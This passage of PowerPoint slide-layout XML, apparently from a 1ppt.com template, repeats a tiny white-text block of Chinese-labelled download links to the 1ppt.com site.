              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout205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05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05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05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05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05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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout205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05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05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05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0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06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06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06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06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06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06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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout206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06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06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06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0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07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07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07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07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07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07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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
